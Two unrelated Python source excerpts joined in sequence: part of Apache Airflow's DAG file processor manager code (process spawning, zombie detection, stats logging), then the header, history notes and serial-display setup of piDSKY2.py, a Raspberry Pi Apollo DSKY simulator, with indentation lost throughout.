def wait_until_finished(self):
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except EOFError:
break
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode we don't send this message from the Manager
# until all the running processors have finished
return
@staticmethod
def _run_processor_manager(dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode):
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__CORE__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0]))
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode)
processor_manager.start()
def harvest_simple_dags(self):
"""
Harvest DAG parsing results from result queue and sync metadata from stat queue.
:return: List of parsing result in SimpleDag format.
"""
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
simple_dags = self._collected_dag_buffer
self._collected_dag_buffer = []
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
return simple_dags
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
self._collected_dag_buffer.append(message)
def _heartbeat_manager(self):
"""
Heartbeat DAG file processor and restart it if we are not done.
"""
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid, self._process.exitcode
)
self.start()
def _sync_metadata(self, stat):
"""
Sync metadata from stat queue and only keep the latest stat.
"""
self._file_paths = stat.file_paths
self._done = stat.done
self._all_files_processed = stat.all_files_processed
@property
def file_paths(self):
return self._file_paths
@property
def done(self):
return self._done
@property
def all_files_processed(self):
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
reap_process_group(self._process.pid, log=self.log)
self._parent_signal_conn.close()
class DagFileProcessorManager(LoggingMixin):
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and put the results to a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param file_paths: list of file paths that contain DAG definitions
:type file_paths: list[unicode]
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessor)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection to communicate signal with processor agent.
:type signal_conn: airflow.models.connection.Connection
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
def __init__(self,
dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode=True):
self._file_paths = file_paths
self._file_path_queue = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._signal_conn = signal_conn
self._async_mode = async_mode
self._parallelism = conf.getint('scheduler', 'max_threads')
if 'sqlite' in conf.get('core', 'sql_alchemy_conn') and self._parallelism > 1:
self.log.error("Cannot use more than 1 thread when using sqlite. "
"Setting parallelism to 1")
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler',
'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler',
'print_stats_interval')
# How many seconds do we wait for tasks to heartbeat before mark them as zombies.
self._zombie_threshold_secs = (
conf.getint('scheduler', 'scheduler_zombie_task_threshold'))
# Map from file path to the processor
self._processors = {}
self._heartbeat_count = 0
# Map from file path to stats about the file
self._file_stats = {} # type: dict(str, DagFileStat)
self._last_zombie_query_time = None
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.utcnow()
# Last time stats were printed
self.last_stat_print_time = timezone.datetime(2000, 1, 1)
# TODO: Remove magic number
self._zombie_query_interval = 10
self._zombies = []
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler',
'dag_dir_list_interval')
self._log = logging.getLogger('airflow.processor_manager')
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up DAG file processors to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
# In sync mode we want timeout=None -- wait forever until a message is received
poll_time = None # type: Optional[float]
if self._async_mode:
poll_time = 0.0
self.log.debug("Starting DagFileProcessorManager in async mode")
else:
poll_time = None
self.log.debug("Starting DagFileProcessorManager in sync mode")
# Used to track how long it takes us to get once around every file in the DAG folder.
self._parsing_start_time = timezone.utcnow()
while True:
loop_start_time = time.time()
if self._signal_conn.poll(poll_time):
agent_signal = self._signal_conn.recv()
self.log.debug("Recived %s singal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_HEARTBEAT:
# continue the loop to parse dags
pass
elif not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
continue
self._refresh_dag_dir()
self._find_zombies()
simple_dags = self.heartbeat()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
if not self._async_mode:
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
simple_dags = self.collect_results()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
dag_parsing_stat = DagParsingStat(self._file_paths,
max_runs_reached,
all_files_processed,
)
self._signal_conn.send(dag_parsing_stat)
if max_runs_reached:
self.log.info("Exiting dag parsing loop as all files "
"have been processed %s times", self._max_runs)
break
if self._async_mode:
loop_duration = time.time() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
def _refresh_dag_dir(self):
"""
Refresh file paths from dag dir if we haven't done it for too long.
"""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors()
except Exception:
self.log.exception("Error removing old import errors")
if STORE_SERIALIZED_DAGS:
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.dag import DagModel
SerializedDagModel.remove_deleted_dags(self._file_paths)
DagModel.deactivate_deleted_dags(self._file_paths)
def _print_stat(self):
"""
Occasionally print out stats about how fast the files are getting processed
"""
if ((timezone.utcnow() - self.last_stat_print_time).total_seconds() > self.print_stats_interval):
if len(self._file_paths) > 0:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = timezone.utcnow()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(
~errors.ImportError.filename.in_(self._file_paths)
)
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path",
"PID",
"Runtime",
"# DAGs",
"# Errors",
"Last Runtime",
"Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = ((now - processor_start_time).total_seconds() if processor_start_time else None)
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge('dag_processing.last_run.seconds_ago.{}'.format(file_name), seconds_ago)
if runtime:
Stats.timing('dag_processing.last_duration.{}'.format(file_name), runtime)
# TODO: Remove before Airflow 2.0
Stats.timing('dag_processing.last_runtime.{}'.format(file_name), runtime)
rows.append((file_path,
processor_pid,
runtime,
num_dags,
num_errors,
last_runtime,
last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[3] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append((file_path,
pid,
"{:.2f}s".format(runtime) if runtime else None,
num_dags,
num_errors,
"{:.2f}s".format(last_runtime) if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None
))
log_str = ("\n" +
"=" * 80 +
"\n" +
"DAG File Processing Stats\n\n" +
tabulate(formatted_rows, headers=headers) +
"\n" +
"=" * 80)
self.log.info(log_str)
@property
def file_paths(self):
return self._file_paths
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue
if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""
Sleeps until all the processors are done.
"""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def collect_results(self):
"""
Collect the result from any finished DAG processors
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
self._kill_timed_out_processors()
finished_processors = {}
""":type : dict[unicode, AbstractDagFileProcessor]"""
running_processors = {}
""":type : dict[unicode, AbstractDagFileProcessor]"""
for file_path, processor in self._processors.items():
if processor.done:
self.log.debug("Processor for %s finished", file_path)
Stats.decr('dag_processing.processes')
now = timezone.utcnow()
finished_processors[file_path] = processor
stat = DagFileStat(
len(processor.result[0]) if processor.result is not None else 0,
processor.result[1] if processor.result is not None else -1,
now,
(now - processor.start_time).total_seconds(),
self.get_run_count(file_path) + 1,
)
self._file_stats[file_path] = stat
else:
running_processors[file_path] = processor
self._processors = running_processors
self.log.debug("%s/%s DAG parsing processes running",
len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing",
len(self._file_path_queue))
# Collect all the DAGs that were found in the processed files
simple_dags = []
for file_path, processor in finished_processors.items():
if processor.result is None:
self.log.warning(
"Processor for %s exited with return code %s.",
processor.file_path, processor.exit_code
)
else:
for simple_dag in processor.result[0]:
simple_dags.append(simple_dag)
return simple_dags
def heartbeat(self):
"""
This should be periodically called by the manager loop. This method will
kick off new processes to process DAG definition files and read the
results from the finished processors.
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
simple_dags = self.collect_results()
# Generate more file paths to process if we processed all the files
# already.
if len(self._file_path_queue) == 0:
self.emit_metrics()
self._parsing_start_time = timezone.utcnow()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
file_paths_recently_processed = []
for file_path in self._file_paths:
last_finish_time = self.get_last_finish_time(file_path)
if (last_finish_time is not None and
(now - last_finish_time).total_seconds() <
self._file_process_interval):
file_paths_recently_processed.append(file_path)
files_paths_at_run_limit = [file_path
for file_path, stat in self._file_stats.items()
if stat.run_count == self._max_runs]
files_paths_to_queue = list(set(self._file_paths) -
set(file_paths_in_progress) -
set(file_paths_recently_processed) -
set(files_paths_at_run_limit))
for file_path, processor in self._processors.items():
self.log.debug(
"File path %s is still being processed (started: %s)",
processor.file_path, processor.start_time.isoformat()
)
self.log.debug(
"Queuing the following files for processing:\n\t%s",
"\n\t".join(files_paths_to_queue)
)
for file_path in files_paths_to_queue:
if file_path not in self._file_stats:
self._file_stats[file_path] = DagFileStat(0, 0, None, None, 0)
self._file_path_queue.extend(files_paths_to_queue)
# Start more processors if we have enough slots and files to process
while (self._parallelism - len(self._processors) > 0 and
len(self._file_path_queue) > 0):
file_path = self._file_path_queue.pop(0)
processor = self._processor_factory(file_path, self._zombies)
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug(
"Started a process (PID: %s) to generate tasks for %s",
processor.pid, file_path
)
self._processors[file_path] = processor
# Update heartbeat count.
self._heartbeat_count += 1
return simple_dags
@provide_session
def _find_zombies(self, session):
"""
Find zombie task instances, which are tasks haven't heartbeated for too long
and update the current zombie list.
"""
now = timezone.utcnow()
zombies = []
if not self._last_zombie_query_time or \
(now - self._last_zombie_query_time).total_seconds() > self._zombie_query_interval:
# to avoid circular imports
from airflow.jobs import LocalTaskJob as LJ
self.log.info("Finding 'running' jobs without a recent heartbeat")
TI = airflow.models.TaskInstance
limit_dttm = timezone.utcnow() - timedelta(
seconds=self._zombie_threshold_secs)
self.log.info("Failing jobs without heartbeat after %s", limit_dttm)
tis = (
session.query(TI)
.join(LJ, TI.job_id == LJ.id)
.filter(TI.state == State.RUNNING)
.filter(
or_(
LJ.state != State.RUNNING,
LJ.latest_heartbeat < limit_dttm,
)
).all()
)
self._last_zombie_query_time = timezone.utcnow()
for ti in tis:
sti = SimpleTaskInstance(ti)
self.log.info(
"Detected zombie job with dag_id %s, task_id %s, and execution date %s",
sti.dag_id, sti.task_id, sti.execution_date.isoformat())
zombies.append(sti)
self._zombies = zombies
def _kill_timed_out_processors(self):
"""
Kill any file processors that timeout to defend against process hangs.
"""
now = timezone.utcnow()
for file_path, processor in self._processors.items():
duration = now - processor.start_time
if duration > self._processor_timeout:
self.log.info(
"Processor for %s with PID %s started at %s has timed out, "
"killing it.",
processor.file_path, processor.pid, processor.start_time.isoformat())
Stats.decr('dag_processing.processes')
Stats.incr('dag_processing.processor_timeouts')
# TODO: Remove ater Airflow 2.0
Stats.incr('dag_file_processor_timeouts')
processor.kill()
def max_runs_reached(self):
"""
:return: whether all file paths have been processed max_runs times
"""
if self._max_runs == -1: # Unlimited runs.
return False
for stat in self._file_stats.values():
if stat.run_count < self._max_runs:
return False
if self._heartbeat_count < self._max_runs:
return False
return True
def terminate(self):
"""
Stops all running processors
:return: None
"""
for processor in self._processors.values():
Stats.decr('dag_processing.processes')
processor.terminate()
def end(self):
"""
Kill all child processes on exit since we don't want to leave
them as orphaned.
"""
pids_to_kill = self.get_all_pids()
if len(pids_to_kill) > 0:
# First try SIGTERM
this_process = psutil.Process(os.getpid())
# Only check child processes to ensure that we don't have a case
# where we kill the wrong process because a child process died
# but the PID got reused.
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
for child in child_processes:
self.log.info("Terminating child PID: %s", child.pid)
child.terminate()
# TODO: Remove magic number
timeout = 5
self.log.info("Waiting up to %s seconds for processes to exit...", timeout)
try:
psutil.wait_procs(
child_processes, timeout=timeout,
callback=lambda x: self.log.info('Terminated PID %s', x.pid))
except psutil.TimeoutExpired:
self.log.debug("Ran out of time while waiting for processes to exit")
# Then SIGKILL
child_processes = [x for x in this_process.children(recursive=True)
if x.is_running() and x.pid in pids_to_kill]
if len(child_processes) > 0:
self.log.info("SIGKILL processes that did not terminate gracefully")
for child in child_processes:
self.log.info("Killing child PID: %s", child.pid)
child.kill()
child.wait()
def emit_metrics(self):
"""
Emmit metrics about dag parsing summary
This is called once every time around the parsing "loop" - i.e. after
all files have been parsed.
"""
parse_time = (timezone.utcnow() - self._parsing_start_time).total_seconds()
Stats.gauge('dag_processing.total_parse_time', parse_time)
Stats.gauge('dagbag_size', sum(stat.num_dags for stat in self._file_stats.values()))
Stats.gauge('dag_processing.import_errors',
sum(stat.import_errors for stat in self._file_stats.values()))
# TODO: Remove before Airflow 2.0
Stats.gauge('collect_dags', parse_time)
Stats.gauge('dagbag_import_errors', sum(stat.import_errors for stat in self._file_stats.values()))
|
piDSKY2.py
|
#!/usr/bin/python3
# Copyright 2017 Ronald S. Burkey
#
# This file is part of yaAGC.
#
# yaAGC is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# yaAGC is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with yaAGC; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Filename: piDSKY2.py
# Purpose: This is a variation of piDSKY.py (a "generic" DSKY
# simulation for use with yaAGC) that is targeted for
# a Raspberry Pi using a specific hardware model, and
# is not really applicable for any other purpose.
# Reference: http://www.ibiblio.org/apollo/developer.html
# Mod history: 2021-02-17 Added functionality for driving a
# Nextion 4.3" display and custom alarm panel board.
# 2017-11-19 RSB Began adapting from piDSKY.py.
# 2017-11-20 RSB Added command-line arguments of various
# kinds and fixed the keyboard binding
# in the tkinter window. Systematized
# the widget positioning to just a few
# variables rather than hardcoding them
# lots of places.
# 2017-11-21 RSB Changed PRO timeout from 0.25 to 0.5.
# 2017-11-22 RSB Graphical rendering of widgets now made
# lazy, so that they're not drawn at all
# if they haven't changed.
# 2017-11-24 RSB Added suggested stuff for numeric keypad.
# 2017-11-25 RSB Added indicator-lamp controls based on
# the external program 'led-panel', and
# duplicated (I hope) Mike Stewart's fixes
# to yaDSKY2 a year or so ago, for the
# RESTART, STANDBY, OPR ERR, and KEY REL
# lamps. For the STANDBY behavior to
# work properly, also changed the PRO
# timeout to 0.75. (Needed to be in the
# range 0.64 to 1.92.)
# 2017-11-26 RSB Added timing filters to prevent the led-panel
# from being run when it is already running.
# My dummy version of led-panel has been
# modified (to test this feature) to always
# take around a second to run, and to include
# a high-resolution time in its display message.
# Fixed dumb bugs in TEMP, VEL, and UPLINK lamps.
# Now expects key-repeat to be off, and detects
# release of the PRO key directly.
# 2017-11-27 RSB At Sam's request, emptied out the default
# command-string for led-panel (to eliminate,
# apparently, the backlights for the keypad).
# Added vncserverui detection. Swapped the
# BackSpace and Tab aliases (now for PRO and
# KEY REL), so as to be able to implement a
# key-release for the PRO alias. The
# RRRRR exit had ceased working and, as far
# as I can tell, should never have worked in
# the first place.
# 2017-11-28 RSB Replaced the single-character global buffers
# I was using for buffering GUI keypresses
# and releases with a proper queue that insures
# no presses or releases are lost and that they
# are all processed in the correct order.
# Added some instrumentation that keeps a count
# of all uses of V35E and prints them out on
# stderr. Added code to catch exceptions in use
# of psutil (that I think can happen when trying
# to get the attributes of a process which has
# just disappeared).
# 2017-11-29 RSB Initial attempt at coding up a PIGPIO-based
# solution for running the indicator lamps,
# vs using the external program 'led-panel'.
# The logic is "complete", but I don't have any
# of the technical documentation for the LED
# board and don't recall the part number of the
# driver chip :-), so it's pretty much guaranteed
# not to work as-is. Nevertheless, stuff like
# the SPI API can be checked out to a certain
# degree.
# 2017-12-04 RSB Fixed PIGPIO control of lamps, I think.
# 2017-12-06 RSB Added 3 dots.
# 2017-12-09 RSB Added --record and --playback. Cleaned up
# the record-keeping about the last values of
# the input channels a lot, so that a lot of
# unnecessary duplication of operations is
# presumably prevented.
# 2017-12-11 RSB Now accepts floats as timestamps in playback
# files, though hopefully that will never occur.
# 2017-12-12 RSB Added AGC input channels (i.e., keystrokes) to
# the --record and --playback features. What I
# intend to do with them in playback is to flash
# the backlight on the associated keys momentarily,
# but I don't have enough technical information to
# do so, nor is it wired up on the DSKY I have yet,
# so at the moment it does nothing in playback other
# than hook it.
# 2017-12-13 RSB Added the key-backlight on playback feature I
# simply hooked yesterday. There was a bug in
# keeping track of which lamps had changed, that
# became apparently only in adding an 8th digit
# for the LED controller.
# 2017-12-16 RSB Now allow AGC-connect operation to timeout
# (currently 10 seconds). Useful for connection
# to yaAGC external to Pi.
# 2017-12-20 RSB Added --lamptest.
# 2017-12-21 RSB Added --manual.
# 2017-12-27 RSB The SPI handle wasn't getting released in under
# some circumstances when the program exited,
# causing re-runs to eventually fail when no
# more SPI handles were available in PIGPIOD.
# I hope I tracked all those down and fixed them.
# 2017-12-28 RSB Added a little extra (probably unnecessary) code
# to insure shutdown of PIGPIO on termination.
# Tests of yesterday's SPI-shutdown code have been
# working fine, though.
# 2017-12-30 RSB Allowed corrupted lines in playback scripts,
# in order to handle comment lines.
# 2017-12-31 RSB Modified the playback scripts in two ways: First,
# it explicitly checks for '#...' and removes them
# as being comments, and doesn't simply rely on
# the line being ill-formed. Secondly, after
# removal of comments, any line NOT of the form
# "float octal octal" is treated as "float command",
# where the command is executed in the background
# by shelling out. Thus, arbitrary BASH commands such
# as audio playback can be put into the script.
# 2018-01-06 MAS Switched the TEMP light to use channel 163 instead
# of channel 11.
# 2018-03-10 RSB Added --gunmetal option.
#
# About the design of this program ... yes, a real Python developer would
# objectify it and have lots and lots of individual modules defining the objects.
# However, I'm not a real Python developer, and this is simply one stand-alone
# file comprising all of the functionality. In other words, I don't see that
# any of this code is particularly reusable, so I haven't bothered to attempt to
# encapsulate it into reusable modules.
#
# In this hardware model:
#
# 1. yaAGC and piDSKY2.py are running on a Raspberry Pi, using the
# Raspbian operating system.
# 2. There is a physical model of a DSKY, accessible via the Pi's GPIO.
# 3. The physical DSKY's keyboard is accessed as a normal keyboard (as
# far as Raspbian is concerned) that provides the usual keycodes
# (0 1 2 3 4 5 6 7 8 9 + - V N C P K R Enter) when the physical DSKY's
# buttons are pressed. Additionally, there are some keycode aliases
# for the keycodes just mentioned, which can be used if alternate physical
# keypads are used.
# 4. The DSKY's discrete indicator lamps (i.e., the upper left section
# of the DSKY's front panel) are accessed either by shelling out to the
# 'led-panel' program for each interaction, or else by using the PIGPIO
# module to directly control the Pi's SPI bus on the GPIO. The former
# is by default, and the latter is done if there is a command-line
# parameter --pigpio=N (where N is a brightness level from 0 to 15).
# 5. The DSKY's upper right portion of the front panel (i.e., the
# numeric registers, COMP ACTY indicator, etc.) consists of an LCD
# panel attached to the Pi via HDMI, composite video, or some other
# means. I.e., it is the display which Raspian uses for its GUI
# desktop. It is accessed using the tkinter module.
#
# One-time setups needed:
#
# sudo apt-get install python3-tk python3-pip imagemagick \
# python-imaging python-imaging-tk python3-psutil xterm
# sudo pip3 install pyscreenshot pillow
#
# For using the --pigpio feature (on a Pi), the following setups are also needed:
#
# sudo apt-get install pigpio python3-pigpio
#
# Moreover, hardware SPI is not enabled in raspbian by default, so for --pigpio on a Pi:
#
# sudo raspi-config
#
# and then use the Interfacing / SPI option to enable the hardware SPI device.
#
# On a Pi, the entire software stack, including yaAGC, is probably best run by
# using the script
#
# xterm [-fullscreen] -e runPiDSKY2.sh [OPTIONS]
#
# In terms of the software model, you basically have two threads, the tkinter module's
# "root" thread (which is used for drawing the graphics mentioned in item #5 on the
# list above, either full-screen or in a 272x480 window), and the "eventLoop" thread,
# which handles all communication with yaAGC, receives keyboard inputs, and performs
# all non-graphical processing, but decides which graphical widgets are supposed to
# be drawn. All of the other code is just callbacks or auxiliary functions used by the
# eventLoop thread. Additionally, Raspbian's RAM disk (/run/user/$UID/) is used for all files
# created by the program, including any temporary files.
import time
import os
import signal
import sys
import argparse
import threading
from tkinter import Tk, Label, PhotoImage
import termios
import fcntl
from pyscreenshot import grab
import psutil
import socket
import serial
#####################################################################################################################################################
# Setup the serial communication (Vlad Mihailescu)
ser_alarm=serial.Serial('/dev/ttySC0', baudrate=9600, timeout=1) # Alarm Panel
ser_disp=serial.Serial('/dev/ttySC1', baudrate=9600, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS, timeout=1) # Display
eof = b'\xff\xff\xff'
turnOFF = b'33808'
turnON = b'24544'
# Initialize Nextion 4.3" HMI (Vlad Mihailescu)
def initDisplay():
time.sleep(2)
#ser_disp.write(b'page1' + eof)
ser_disp.write(b'cal.bco=' + turnOFF + eof)
#ser_disp.write(b'pl.bco=' + turnOFF + eof)
#ser_disp.write(b'vl.bco=' + turnOFF + eof)
#ser_disp.write(b'nl.bco=' + turnOFF + eof)
ser_disp.write(b'p0.txt=""' + eof)
ser_disp.write(b'p1.txt=""' + eof)
ser_disp.write(b'v0.txt=""' + eof)
ser_disp.write(b'v1.txt=""' + eof)
ser_disp.write(b'n0.txt=""' + eof)
ser_disp.write(b'n1.txt=""' + eof)
ser_disp.write(b'l1.pco=23243' + eof)
ser_disp.write(b'l2.pco=' + turnOFF + eof)
ser_disp.write(b'l3.pco=' + turnOFF + eof)
ser_disp.write(b'r10.txt=""' + eof)
ser_disp.write(b'r11.txt=""' + eof)
ser_disp.write(b'r12.txt=""' + eof)
ser_disp.write(b'r13.txt=""' + eof)
ser_disp.write(b'r14.txt=""' + eof)
ser_disp.write(b'r15.txt=""' + eof)
ser_disp.write(b'r20.txt=""' + eof)
ser_disp.write(b'r21.txt=""' + eof)
ser_disp.write(b'r22.txt=""' + eof)
ser_disp.write(b'r23.txt=""' + eof)
ser_disp.write(b'r24.txt=""' + eof)
ser_disp.write(b'r25.txt=""' + eof)
ser_disp.write(b'r30.txt=""' + eof)
ser_disp.write(b'r31.txt=""' + eof)
ser_disp.write(b'r32.txt=""' + eof)
ser_disp.write(b'r33.txt=""' + eof)
ser_disp.write(b'r34.txt=""' + eof)
ser_disp.write(b'r35.txt=""' + eof)
ser_disp.flush()
homeDir = os.path.expanduser("~")
